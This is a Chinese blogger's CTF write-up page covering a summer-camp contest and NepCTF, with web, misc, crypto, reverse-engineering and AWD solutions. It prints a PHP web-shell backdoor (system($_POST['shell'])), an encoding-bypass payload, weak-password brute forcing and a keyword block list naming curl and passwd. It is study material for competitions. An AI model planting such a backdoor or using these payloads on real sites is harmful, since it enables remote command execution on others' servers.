<!DOCTYPE HTML>
<html lang="en">


<head>
    <meta charset="utf-8">
    <meta name="keywords" content="game--week5, shiango">
    <meta name="description" content="A Freshman">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no">
    <meta name="renderer" content="webkit|ie-stand|ie-comp">
    <meta name="mobile-web-app-capable" content="yes">
    <meta name="format-detection" content="telephone=no">
    <meta name="apple-mobile-web-app-capable" content="yes">
    <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
    <!-- Global site tag (gtag.js) - Google Analytics -->


    <title>game--week5 | shiango</title>
    <link rel="icon" type="image/png" href="/favicon.png">

    <link rel="stylesheet" type="text/css" href="/libs/awesome/css/all.css">
    <link rel="stylesheet" type="text/css" href="/libs/materialize/materialize.min.css">
    <link rel="stylesheet" type="text/css" href="/libs/aos/aos.css">
    <link rel="stylesheet" type="text/css" href="/libs/animate/animate.min.css">
    <link rel="stylesheet" type="text/css" href="/libs/lightGallery/css/lightgallery.min.css">
    <link rel="stylesheet" type="text/css" href="/css/matery.css">
    <link rel="stylesheet" type="text/css" href="/css/my.css">

    <script src="/libs/jquery/jquery.min.js"></script>

<meta name="generator" content="Hexo 5.4.0"><link rel="alternate" href="/atom.xml" title="shiango" type="application/atom+xml">
</head>




<body>
    <header class="navbar-fixed">
    <nav id="headNav" class="bg-color nav-transparent">
        <div id="navContainer" class="nav-wrapper container">
            <div class="brand-logo">
                <a href="/" class="waves-effect waves-light">
                    
                    <img src="/medias/logo.png" class="logo-img" alt="LOGO">
                    
                    <span class="logo-span">shiango</span>
                </a>
            </div>
            

<a href="#" data-target="mobile-nav" class="sidenav-trigger button-collapse"><i class="fas fa-bars"></i></a>
<ul class="right nav-menu">
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/" class="waves-effect waves-light">
      
      <i class="fas fa-home" style="zoom: 0.6;"></i>
      
      <span>Index</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/tags" class="waves-effect waves-light">
      
      <i class="fas fa-tags" style="zoom: 0.6;"></i>
      
      <span>Tags</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/categories" class="waves-effect waves-light">
      
      <i class="fas fa-bookmark" style="zoom: 0.6;"></i>
      
      <span>Categories</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/archives" class="waves-effect waves-light">
      
      <i class="fas fa-archive" style="zoom: 0.6;"></i>
      
      <span>Archives</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/about" class="waves-effect waves-light">
      
      <i class="fas fa-user-circle" style="zoom: 0.6;"></i>
      
      <span>About</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/contact" class="waves-effect waves-light">
      
      <i class="fas fa-comments" style="zoom: 0.6;"></i>
      
      <span>Contact</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/friends" class="waves-effect waves-light">
      
      <i class="fas fa-address-book" style="zoom: 0.6;"></i>
      
      <span>Friends</span>
    </a>
    
  </li>
  
  <li>
    <a href="#searchModal" class="modal-trigger waves-effect waves-light">
      <i id="searchIcon" class="fas fa-search" title="Search" style="zoom: 0.85;"></i>
    </a>
  </li>
</ul>


<div id="mobile-nav" class="side-nav sidenav">

    <div class="mobile-head bg-color">
        
        <img src="/medias/logo.png" class="logo-img circle responsive-img">
        
        <div class="logo-name">shiango</div>
        <div class="logo-desc">
            
            A Freshman
            
        </div>
    </div>

    

    <ul class="menu-list mobile-menu-list">
        
        <li class="m-nav-item">
	  
		<a href="/" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-home"></i>
			
			Index
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/tags" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-tags"></i>
			
			Tags
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/categories" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-bookmark"></i>
			
			Categories
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/archives" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-archive"></i>
			
			Archives
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/about" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-user-circle"></i>
			
			About
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/contact" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-comments"></i>
			
			Contact
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/friends" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-address-book"></i>
			
			Friends
		</a>
          
        </li>
        
        
        <li><div class="divider"></div></li>
        <li>
            <a href="https://github.com/blinkfox/hexo-theme-matery" class="waves-effect waves-light" target="_blank">
                <i class="fab fa-github-square fa-fw"></i>Fork Me
            </a>
        </li>
        
    </ul>
</div>


        </div>

        
            <style>
    .nav-transparent .github-corner {
        display: none !important;
    }

    .github-corner {
        position: absolute;
        z-index: 10;
        top: 0;
        right: 0;
        border: 0;
        transform: scale(1.1);
    }

    .github-corner svg {
        color: #0f9d58;
        fill: #fff;
        height: 64px;
        width: 64px;
    }

    .github-corner:hover .octo-arm {
        animation: a 0.56s ease-in-out;
    }

    .github-corner .octo-arm {
        animation: none;
    }

    @keyframes a {
        0%,
        to {
            transform: rotate(0);
        }
        20%,
        60% {
            transform: rotate(-25deg);
        }
        40%,
        80% {
            transform: rotate(10deg);
        }
    }
</style>

<a href="https://github.com/blinkfox/hexo-theme-matery" class="github-corner tooltipped hide-on-med-and-down" target="_blank"
   data-tooltip="Fork Me" data-position="left" data-delay="50">
    <svg viewBox="0 0 250 250" aria-hidden="true">
        <path d="M0,0 L115,115 L130,115 L142,142 L250,250 L250,0 Z"></path>
        <path d="M128.3,109.0 C113.8,99.7 119.0,89.6 119.0,89.6 C122.0,82.7 120.5,78.6 120.5,78.6 C119.2,72.0 123.4,76.3 123.4,76.3 C127.3,80.9 125.5,87.3 125.5,87.3 C122.9,97.6 130.6,101.9 134.4,103.2"
              fill="currentColor" style="transform-origin: 130px 106px;" class="octo-arm"></path>
        <path d="M115.0,115.0 C114.9,115.1 118.7,116.5 119.8,115.4 L133.7,101.6 C136.9,99.2 139.9,98.4 142.2,98.6 C133.8,88.0 127.5,74.4 143.8,58.0 C148.5,53.4 154.0,51.2 159.7,51.0 C160.3,49.4 163.2,43.6 171.4,40.1 C171.4,40.1 176.1,42.5 178.8,56.2 C183.1,58.6 187.2,61.8 190.9,65.4 C194.5,69.0 197.7,73.2 200.1,77.6 C213.8,80.2 216.3,84.9 216.3,84.9 C212.7,93.1 206.9,96.0 205.4,96.6 C205.1,102.4 203.0,107.8 198.3,112.5 C181.9,128.9 168.3,122.5 157.7,114.1 C157.9,116.9 156.7,120.9 152.7,124.9 L141.0,136.5 C139.8,137.7 141.6,141.9 141.8,141.8 Z"
              fill="currentColor" class="octo-body"></path>
    </svg>
</a>
        
    </nav>

</header>

    



<div class="bg-cover pd-header post-cover" style="background-image: url('/medias/featureimages/7.jpg')">
    <div class="container" style="right: 0px;left: 0px;">
        <div class="row">
            <div class="col s12 m12 l12">
                <div class="brand">
                    <h1 class="description center-align post-title">game--week5</h1>
                </div>
            </div>
        </div>
    </div>
</div>




<main class="post-container content">

    
    <link rel="stylesheet" href="/libs/tocbot/tocbot.css">
<style>
    #articleContent h1::before,
    #articleContent h2::before,
    #articleContent h3::before,
    #articleContent h4::before,
    #articleContent h5::before,
    #articleContent h6::before {
        display: block;
        content: " ";
        height: 100px;
        margin-top: -100px;
        visibility: hidden;
    }

    #articleContent :focus {
        outline: none;
    }

    .toc-fixed {
        position: fixed;
        top: 64px;
    }

    .toc-widget {
        width: 345px;
        padding-left: 20px;
    }

    .toc-widget .toc-title {
        padding: 35px 0 15px 17px;
        font-size: 1.5rem;
        font-weight: bold;
        line-height: 1.5rem;
    }

    .toc-widget ol {
        padding: 0;
        list-style: none;
    }

    #toc-content {
        padding-bottom: 30px;
        overflow: auto;
    }

    #toc-content ol {
        padding-left: 10px;
    }

    #toc-content ol li {
        padding-left: 10px;
    }

    #toc-content .toc-link:hover {
        color: #42b983;
        font-weight: 700;
        text-decoration: underline;
    }

    #toc-content .toc-link::before {
        background-color: transparent;
        max-height: 25px;

        position: absolute;
        right: 23.5vw;
        display: block;
    }

    #toc-content .is-active-link {
        color: #42b983;
    }

    #floating-toc-btn {
        position: fixed;
        right: 15px;
        bottom: 76px;
        padding-top: 15px;
        margin-bottom: 0;
        z-index: 998;
    }

    #floating-toc-btn .btn-floating {
        width: 48px;
        height: 48px;
    }

    #floating-toc-btn .btn-floating i {
        line-height: 48px;
        font-size: 1.4rem;
    }
</style>
<div class="row">
    <div id="main-content" class="col s12 m12 l9">
        <!-- 文章内容详情 -->
<div id="artDetail">
    <div class="card">
        <div class="card-content article-info">
            <div class="row tag-cate">
                <div class="col s7">
                    
                    <div class="article-tag">
                        
                            <a href="/tags/ctf-games/">
                                <span class="chip bg-color">ctf-games</span>
                            </a>
                        
                    </div>
                    
                </div>
                <div class="col s5 right-align">
                    
                </div>
            </div>

            <div class="post-info">
                
                <div class="post-date info-break-policy">
                    <i class="far fa-calendar-minus fa-fw"></i>Publish Date:&nbsp;&nbsp;
                    2022-07-19
                </div>
                

                

                

                

                
            </div>
        </div>
        <hr class="clearfix">

        

        

        <div class="card-content article-card-content">
            <div id="articleContent">
                <p>7.13–7.20记录</p>
<h3 id="1-夏令营内部赛"><a href="#1-夏令营内部赛" class="headerlink" title="1.夏令营内部赛"></a>1.夏令营内部赛</h3><p>这里我就直接贴wp了，很多题目都很简单，自己跑去做选择题，结果还不如直接做CTF，寄：</p>
<h4 id="Web"><a href="#Web" class="headerlink" title="Web"></a><strong>Web</strong></h4><h5 id="web-1-到底要怎么拿到KEY呢"><a href="#web-1-到底要怎么拿到KEY呢" class="headerlink" title="web - 1 到底要怎么拿到KEY呢?"></a>web - 1 到底要怎么拿到KEY呢?</h5><p>扫描器扫描，找到manager.php</p>
<p>然后访问，直接爆破弱口令字典，密码为667788</p>
<p>bp可以直接访问，如果在浏览器中的话要把js对密码输入的限制更改了</p>
<p>flag:KEY{p08eqfu1q4g0a} </p>
<p><strong>web - 2</strong>  php大法</p>
<p>eregi绕过，审计代码后发现有一段urldecode，说明本题可以进行二次编码，对G最后一位进行两次url编码就可以了。</p>
<p>payload：?id=hackerDO%25%34%37</p>
<p>flag:flag{fsdgesgerherXXXXXX} </p>
<h5 id="web-3-小明是个喜欢等价交换的人，要拿走他的KEY，至少要给他些什么东西！"><a href="#web-3-小明是个喜欢等价交换的人，要拿走他的KEY，至少要给他些什么东西！" class="headerlink" title="web - 3 小明是个喜欢等价交换的人，要拿走他的KEY，至少要给他些什么东西！"></a><strong>web - 3</strong> 小明是个喜欢等价交换的人，要拿走他的KEY，至少要给他些什么东西！</h5><h3 id="MISC"><a href="#MISC" class="headerlink" title="MISC"></a><strong>MISC</strong></h3><h5 id="MISC-1-passwd"><a href="#MISC-1-passwd" class="headerlink" title="MISC - 1 passwd"></a><strong>MISC - 1</strong> passwd</h5><p>No.43后出现Password:</p>
<p>分析流量</p>
<p>从218→223每次传1个字符</p>
<p>backdoor<del><del><del>00Rm8<del>ate</p>
<p>整理最后有效的密码应该为backd00Rmate</p>
<p>如果按照tcp追踪流的话，也可以得到  “.”可以代表着回退 即可得到backd00Rmate</p>
<p>​                 <img src="../images/1b53Oul6vkCaYyMiprnqkQ.png" alt="img">        </p>
<h5 id="MISC-2-表白"><a href="#MISC-2-表白" class="headerlink" title="MISC - 2 表白"></a><strong>MISC - 2</strong> 表白</h5><p>明文攻击出来的flag提交显示错误，有没有师傅能看看的</p>
<p>出来的flag：flag{7ip_Fi13_S0m3tim3s_s0_3a5y@}</p>
<p>感觉题目错了</p>
<p>可能题目真的是错了  后台的答案是：KEY{you_ar3_g00d_bOy}，与最后的不对应，但是知道如何得到上面的flag就行</p>
<h5 id="MISC-3-海贼王壁纸"><a href="#MISC-3-海贼王壁纸" class="headerlink" title="MISC - 3 海贼王壁纸"></a><strong>MISC - 3</strong> 海贼王壁纸</h5><p>直接用notepad++全文件夹搜索key{，就可以找到了</p>
<p>flag：key{0123f42483c6cf93635d252cf79bbf0f}</p>
<h5 id="MISC-4-看不见的flag"><a href="#MISC-4-看不见的flag" class="headerlink" title="MISC - 4 看不见的flag"></a><strong>MISC - 4</strong> 看不见的flag</h5><h6 id="图片文件无法查看的原因：1-文件头2-crc"><a href="#图片文件无法查看的原因：1-文件头2-crc" class="headerlink" title="图片文件无法查看的原因：1.文件头2.crc"></a>图片文件无法查看的原因：1.文件头2.crc</h6><p>将png头文件修复（89 50），接下来观察crc发现crc校验错误，脚本爆破后发现图片的宽为709，直接改宽即可得到flag。</p>
<p>exp:</p>
<p>import os</p>
<p>import binascii</p>
<p>import struct</p>
<p>crcbp = open(“misc4.png”, “rb”).read()    #打开图片</p>
<p>for i in range(2000):</p>
<p>​    for j in range(2000):</p>
<p>​        data = crcbp[12:16] + \</p>
<p>​            struct.pack(‘&gt;i’, i)+struct.pack(‘&gt;i’, j)+crcbp[24:29]</p>
<p>​        crc32 = binascii.crc32(data) &amp; 0xffffffff</p>
<p>​        if(crc32 == 0x932f8a6b):    #图片当前CRC</p>
<p>​            print(i, j)</p>
<p>​            print(‘hex:’, hex(i), hex(j))</p>
<p>flag：flag{Png_is_v3ry_fu0ny!}</p>
<h5 id="MISC-5-中国菜刀"><a href="#MISC-5-中国菜刀" class="headerlink" title="MISC - 5 中国菜刀"></a><strong>MISC - 5 中国菜刀</strong></h5><p>知道是中国菜刀之后，就可以知道是http流量了，特别关注http流量，发现都是经过了base加密的，然后一个一个看下来，一共有6个http的包，最后一个包里带着答案</p>
<p>​                 <img src="../images/7Xye1hofowcqK6RsHKCB9w.pngw=1280&h=565.1320754716982" alt="img">        </p>
<p>​                 <img src="../images/gc5TIUSOW-quWSbhUc4bzw.pngw=1280&h=402.11508553654744" alt="img">        </p>
<p>设置为解码压缩，然后一个一个试下去，得到key</p>
<p>key{8769fe393f2b998fa6a11afe2bfcd65e} </p>
<p>如果各位师傅还有什么解法可以附在下面，互相学习qaq</p>
<p>​                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                         </p>
<h4 id="密码"><a href="#密码" class="headerlink" title="密码"></a><strong>密码</strong></h4><h5 id="qwd3"><a href="#qwd3" class="headerlink" title="qwd3"></a><strong>qwd3</strong></h5><p>GVXDM4JXHA3DQNLOGMZTONBWHA2TENJWG4YDIOJVGYZTANJSGZZDMMJTGMZTAM3R</p>
<p>↓base32</p>
<p>5n6q78685n337468525670495630526r6133303q</p>
<p>↓caeser key=13   (rot13)</p>
<p>5a6d78685a337468525670495630526e6133303d</p>
<p>↓hex</p>
<p>ZmxhZ3thRVpIV0Rna30=</p>
<p>↓base64</p>
<p>flag{aEZHWDgk}</p>
<p>这个只要用工具跑一下就好了ciphey</p>
<h5 id="893"><a href="#893" class="headerlink" title="893"></a><strong>893</strong></h5><p>4p4n575851324332474r3245345n43474n5634465553434o50424846514q4235</p>
<p>↓caesar key=13</p>
<p>4c4a575851324332474e3245345a43474a5634465553434b50424846514d4235</p>
<p>↓hex</p>
<p>LJWXQ2C2GN2E4ZCGJV4FUSCKPBHFQMB5</p>
<p>↓base32</p>
<p>ZmxhZ3tNdFMxZHJxNX0=</p>
<p>↓base64</p>
<p>flag{MtS1drq5}</p>
<h4 id="RE"><a href="#RE" class="headerlink" title="RE"></a><strong>RE</strong></h4><h5 id="听说很简单"><a href="#听说很简单" class="headerlink" title="听说很简单"></a><strong>听说很简单</strong></h5><p>IDA逻辑分析完编写exp：</p>
<p>s=’sKfxEeft}f{gyrYgthtyhifsjei53UUrrr_t2cdsef66246087138\0087138’</p>
<p>flag=’’</p>
<p>a=[1,4,14,10,5,36,23,42,13,19,28,13,27,39,48,41,42]</p>
<p>for i in a:</p>
<p>  flag+=s[i]</p>
<p>flag+=”1”</p>
<p>flag+=”0”</p>
<p>flag+=”2”</p>
<p>flag+=”4”</p>
<p>flag+=”}”</p>
<p>print(flag)</p>
<h4 id="AWD"><a href="#AWD" class="headerlink" title="AWD"></a><strong>AWD</strong></h4><h5 id="break"><a href="#break" class="headerlink" title="break"></a><strong>break</strong></h5><p>D盾扫描，发现/about.php下存在命令执行，即对应源码中的footer.php。</p>
<p>footer.php:</p>
<?php 

  $shell=$_POST['shell'];

  system($shell);

  if($shell !=""){

​    exit();

  }

?>

<p>毫无过滤的命令执行，因此直接输入命令即可getkey</p>
<p>​                 <img src="../images/EJjPJPakeVrBIduPwg2T1w.png" alt="img">        </p>
<p>​                 <img src="../images/Snc9h8wUciYMBAk1hEfRLg.png" alt="img">        </p>
<h5 id="fix"><a href="#fix" class="headerlink" title="fix"></a><strong>fix</strong></h5><p>修复建议，过滤curl等命令，允许的话建议删除该后门</p>
<p>footer.php:</p>
<?php 

  $shell=$_POST['shell'];

​    if(preg_match("/curl|cat|ls|passwd|rm /i",$shell)){

​        die("no way");

​    }

  system($shell);

  if($shell !=""){

​    exit();

  }

?>

<h3 id="2-nepctf"><a href="#2-nepctf" class="headerlink" title="2.nepctf"></a>2.nepctf</h3><p>这些题目很多都是赛后才复现出来的，然后还是一样的喜欢社工题</p>
<h4 id="web"><a href="#web" class="headerlink" title="web"></a>web</h4><h5 id="just-kidding"><a href="#just-kidding" class="headerlink" title="just kidding"></a>just kidding</h5><p>这题先扫到<a target="_blank" rel="noopener" href="http://www.zip源码下下来后结合题目提示laravel,所以我们知道这是一个php框架/">www.zip源码下下来后结合题目提示Laravel，所以我们知道这是一个PHP框架</a> 。</p>
<h4 id="misc"><a href="#misc" class="headerlink" title="misc"></a>misc</h4><h5 id="馅饼？陷阱！"><a href="#馅饼？陷阱！" class="headerlink" title="馅饼？陷阱！"></a>馅饼？陷阱！</h5><p>这是一道社工题，我去百度搜图没找到所以就根据三个关键的店名去联系，分别是如家酒店，大禾寿司，东北饺子馆，然后直接连起来去搜索，这样效率很低，找了一个多小时，而且这些点都是连锁的，在各地都有很多，后来看了大佬的思路（<strong>是先找到特殊的可以缩小范围的地理名词</strong>：这种往往很隐蔽，比如水注，路标，或者甚至车牌号–这个比较不准，还是要看当地的地标好一些）</p>
<p><img src="../images/image-20220719103211015.png" alt="image-20220719103211015"></p>
<p>这样就很快缩小了。</p>
<h5 id="签到题"><a href="#签到题" class="headerlink" title="签到题"></a>签到题</h5><p>先压缩包解密，然后伪加密，然后键盘流量分析</p>
<p>解压：</p>
<p>import zipfile<br>import os<br>import time</p>
<p>path = ‘D:\zips\‘<br>init = ‘232.zip’<br>zip_path = ‘’</p>
<p>while True:<br>    for root, dirs, files in os.walk(path):<br>        if len(files) &lt; 2:<br>            zip_path = path + init<br>        zip_file = zipfile.ZipFile(zip_path)<br>        file_in = zip_file.namelist()[0]<br>        zip_file.extract(file_in, path=path)<br>        zip_path = path + file_in<br>        print(zip_path)</p>
<p>用tshark把usb的数据提出来</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">tshark -r .\keyboard.pcap -T fields -e usbhid.data &gt; out.txt</span><br></pre></td></tr></table></figure>

<p>加冒号:</p>
<p>f=open(‘/home/kali/桌面/usbdata2.txt’,’r’)<br>fi=open(‘out.txt’,’w’)<br>while 1:<br>  a=f.readline().strip()<br>  if a:<br>    if len(a)==16:#键盘流量的话len为16鼠标为8<br>      out=’’<br>      for i in range(0,len(a),2):<br>        if i+2 != len(a):<br>          out+=a[i]+a[i+1]+”:”<br>        else:<br>          out+=a[i]+a[i+1]<br>      fi.write(out)<br>      fi.write(‘\n’)<br>  else:<br>    break<br>fi.close()</p>
<p>键盘流量处理：<br>mappings = { 0x04:”A”,  0x05:”B”,  0x06:”C”, 0x07:”D”, 0x08:”E”, 0x09:”F”, 0x0A:”G”,  0x0B:”H”, 0x0C:”I”,  0x0D:”J”, 0x0E:”K”, 0x0F:”L”, 0x10:”M”, 0x11:”N”,0x12:”O”,  0x13:”P”, 0x14:”Q”, 0x15:”R”, 0x16:”S”, 0x17:”T”, 0x18:”U”,0x19:”V”, 0x1A:”W”, 0x1B:”X”, 0x1C:”Y”, 0x1D:”Z”, 0x1E:”1”, 0x1F:”2”, 0x20:”3”, 0x21:”4”, 0x22:”5”,  0x23:”6”, 0x24:”7”, 0x25:”8”, 0x26:”9”, 0x27:”0”, 0x28:”\n”, 0x2a:”[DEL]”,  0X2B:”    “, 0x2C:” “,  0x2D:”-“, 0x2E:”=”, 0x2F:”[“,  0x30:”]”,  0x31:”\“, 0x32:”~”, 0x33:”;”,  0x34:”‘“, 0x36:”,”,  0x37:”.” }<br>nums = []<br>keys = open(‘out.txt’)<br>for line in keys:<br>    if line[0]!=’0’ or line[1]!=’0’ or line[3]!=’0’ or line[4]!=’0’ or line[9]!=’0’ or line[10]!=’0’ or line[12]!=’0’ or line[13]!=’0’ or line[15]!=’0’ or line[16]!=’0’ or line[18]!=’0’ or line[19]!=’0’ or line[21]!=’0’ or line[22]!=’0’:<br>         continue<br>    nums.append(int(line[6:8],16))<br>keys.close()<br>output = “”<br>for n in nums:<br>    if n == 0 :<br>        continue<br>    if n in mappings:<br>        output += mappings[n]<br>    else:<br>        output += ‘[unknown]’<br>print (‘output :\n’ + output)</p>
<p><img src="../images/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE%202022-07-26%20102442.png" alt="屏幕截图 2022-07-26 102442"></p>
<h5 id="少见的bbbbase"><a href="#少见的bbbbase" class="headerlink" title="少见的bbbbase"></a>少见的bbbbase</h5><p><a target="_blank" rel="noopener" href="https://juejin.cn/post/7081437157541281805">CTF文件隐写总结之图片 - 掘金 (juejin.cn)</a></p>
<p>这里试过010的一些常见的隐写，和长宽高，crc，lsp的隐写方法后，学习了一种新的隐写方法，可以用stegdetect来检测常见的隐写：</p>
<p>Stegdetect可以检测到通过JSteg、JPHide、OutGuess、Invisible Secrets、F5、appendX和Camouflage等这些隐写工具隐藏的信息</p>
<p>stegdetect.exe -tjopi -s 10.0 C:\Users\86139\Desktop\nepctf\少见的bbbbase\少见的bbbbase.jpg</p>
<p><img src="../images/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE%202022-07-25%20192129.png" alt="屏幕截图 2022-07-25 192129"></p>
<p>然后再用探测密码的脚本跑一下：</p>
<p>stegbreak.exe -r rules.ini -f password.txt  少见的bbbbase.jpg</p>
<p><img src="../images/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE%202022-07-25%20192555.png" alt="屏幕截图 2022-07-25 192555"></p>
<p>然后再用JPHS提取出隐写的内容：保存为txt格式</p>
<p>解出来是base58加密一转就出来了。</p>
<p><img src="../images/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE%202022-07-25%20193241.png" alt="屏幕截图 2022-07-25 193241"></p>
<h5 id="花花画画画花花"><a href="#花花画画画花花" class="headerlink" title="花花画画画花花"></a>花花画画画花花</h5><p>这个直接导入osz进入osu!（网游）谱面就可以找到flag，有画出来。</p>

                
            </div>
            <hr/>

            

    <div class="reprint" id="reprint-statement">
        
            <div class="reprint__author">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-user">
                        Author:
                    </i>
                </span>
                <span class="reprint-info">
                    <a href="/about" rel="external nofollow noreferrer">hz</a>
                </span>
            </div>
            <div class="reprint__type">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-link">
                        Link:
                    </i>
                </span>
                <span class="reprint-info">
                    <a href="http://example.com/2022/07/19/game-week5/">http://example.com/2022/07/19/game-week5/</a>
                </span>
            </div>
            <div class="reprint__notice">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-copyright">
                        Reprint policy:
                    </i>
                </span>
                <span class="reprint-info">
                    All articles in this blog are used except for special statements
                    <a href="https://creativecommons.org/licenses/by/4.0/deed.zh" rel="external nofollow noreferrer" target="_blank">CC BY 4.0</a>
                    reprint policy. If reproduced, please indicate source
                    <a href="/about" target="_blank">hz</a>
                    !
                </span>
            </div>
        
    </div>

    <script async defer>
      document.addEventListener("copy", function (e) {
        let toastHTML = '<span>Copied successfully, please follow the reprint policy of this article</span><button class="btn-flat toast-action" onclick="navToReprintStatement()" style="font-size: smaller">more</a>';
        M.toast({html: toastHTML})
      });

      function navToReprintStatement() {
        $("html, body").animate({scrollTop: $("#reprint-statement").offset().top - 80}, 800);
      }
    </script>



            <div class="tag_share" style="display: block;">
                <div class="post-meta__tag-list" style="display: inline-block;">
                    
                        <div class="article-tag">
                            
                                <a href="/tags/ctf-games/">
                                    <span class="chip bg-color">ctf-games</span>
                                </a>
                            
                        </div>
                    
                </div>
                <div class="post_share" style="zoom: 80%; width: fit-content; display: inline-block; float: right; margin: -0.15rem 0;">
                    <link rel="stylesheet" type="text/css" href="/libs/share/css/share.min.css">
<div id="article-share">

    
    <div class="social-share" data-sites="twitter,facebook,google,qq,qzone,wechat,weibo,douban,linkedin" data-wechat-qrcode-helper="<p>微信扫一扫即可分享！</p>"></div>
    <script src="/libs/share/js/social-share.min.js"></script>
    

    

</div>

                </div>
            </div>
            
                <style>
    #reward {
        margin: 40px 0;
        text-align: center;
    }

    #reward .reward-link {
        font-size: 1.4rem;
        line-height: 38px;
    }

    #reward .btn-floating:hover {
        box-shadow: 0 6px 12px rgba(0, 0, 0, 0.2), 0 5px 15px rgba(0, 0, 0, 0.2);
    }

    #rewardModal {
        width: 320px;
        height: 350px;
    }

    #rewardModal .reward-title {
        margin: 15px auto;
        padding-bottom: 5px;
    }

    #rewardModal .modal-content {
        padding: 10px;
    }

    #rewardModal .close {
        position: absolute;
        right: 15px;
        top: 15px;
        color: rgba(0, 0, 0, 0.5);
        font-size: 1.3rem;
        line-height: 20px;
        cursor: pointer;
    }

    #rewardModal .close:hover {
        color: #ef5350;
        transform: scale(1.3);
        -moz-transform:scale(1.3);
        -webkit-transform:scale(1.3);
        -o-transform:scale(1.3);
    }

    #rewardModal .reward-tabs {
        margin: 0 auto;
        width: 210px;
    }

    .reward-tabs .tabs {
        height: 38px;
        margin: 10px auto;
        padding-left: 0;
    }

    .reward-content ul {
        padding-left: 0 !important;
    }

    .reward-tabs .tabs .tab {
        height: 38px;
        line-height: 38px;
    }

    .reward-tabs .tab a {
        color: #fff;
        background-color: #ccc;
    }

    .reward-tabs .tab a:hover {
        background-color: #ccc;
        color: #fff;
    }

    .reward-tabs .wechat-tab .active {
        color: #fff !important;
        background-color: #22AB38 !important;
    }

    .reward-tabs .alipay-tab .active {
        color: #fff !important;
        background-color: #019FE8 !important;
    }

    .reward-tabs .reward-img {
        width: 210px;
        height: 210px;
    }
</style>

<div id="reward">
    <a href="#rewardModal" class="reward-link modal-trigger btn-floating btn-medium waves-effect waves-light red">赏</a>

    <!-- Modal Structure -->
    <div id="rewardModal" class="modal">
        <div class="modal-content">
            <a class="close modal-close"><i class="fas fa-times"></i></a>
            <h4 class="reward-title">你的赏识是我前进的动力</h4>
            <div class="reward-content">
                <div class="reward-tabs">
                    <ul class="tabs row">
                        <li class="tab col s6 alipay-tab waves-effect waves-light"><a href="#alipay">支付宝</a></li>
                        <li class="tab col s6 wechat-tab waves-effect waves-light"><a href="#wechat">微 信</a></li>
                    </ul>
                    <div id="alipay">
                        <img src="/medias/reward/alipay.jpg" class="reward-img" alt="支付宝打赏二维码">
                    </div>
                    <div id="wechat">
                        <img src="/medias/reward/wechat.png" class="reward-img" alt="微信打赏二维码">
                    </div>
                </div>
            </div>
        </div>
    </div>
</div>

<script>
    $(function () {
        $('.tabs').tabs();
    });
</script>

            
        </div>
    </div>

    

    

    

    

    

    

    

    

    

<article id="prenext-posts" class="prev-next articles">
    <div class="row article-row">
        
        <div class="article col s12 m6" data-aos="fade-up">
            <div class="article-badge left-badge text-color">
                <i class="fas fa-chevron-left"></i>&nbsp;Previous</div>
            <div class="card">
                <a href="/2022/07/25/hole-week1/">
                    <div class="card-image">
                        
                        
                        <img src="/medias/featureimages/11.jpg" class="responsive-img" alt="hole--week1">
                        
                        <span class="card-title">hole--week1</span>
                    </div>
                </a>
                <div class="card-content article-content">
                    <div class="summary block-with-text">
                        
                            
                        
                    </div>
                    <div class="publish-info">
                        <span class="publish-date">
                            <i class="far fa-clock fa-fw icon-date"></i>2022-07-25
                        </span>
                        <span class="publish-author">
                            
                            <i class="fas fa-user fa-fw"></i>
                            hz
                            
                        </span>
                    </div>
                </div>
                
                <div class="card-action article-tags">
                    
                    <a href="/tags/%E6%BC%8F%E6%B4%9E%E6%8C%96%E6%8E%98/">
                        <span class="chip bg-color">漏洞挖掘</span>
                    </a>
                    
                </div>
                
            </div>
        </div>
        
        
        <div class="article col s12 m6" data-aos="fade-up">
            <div class="article-badge right-badge text-color">
                Next&nbsp;<i class="fas fa-chevron-right"></i>
            </div>
            <div class="card">
                <a href="/2022/07/19/vulhub2/">
                    <div class="card-image">
                        
                        
                        <img src="/medias/featureimages/18.jpg" class="responsive-img" alt="vulhub2">
                        
                        <span class="card-title">vulhub2</span>
                    </div>
                </a>
                <div class="card-content article-content">
                    <div class="summary block-with-text">
                        
                            
                        
                    </div>
                    <div class="publish-info">
                            <span class="publish-date">
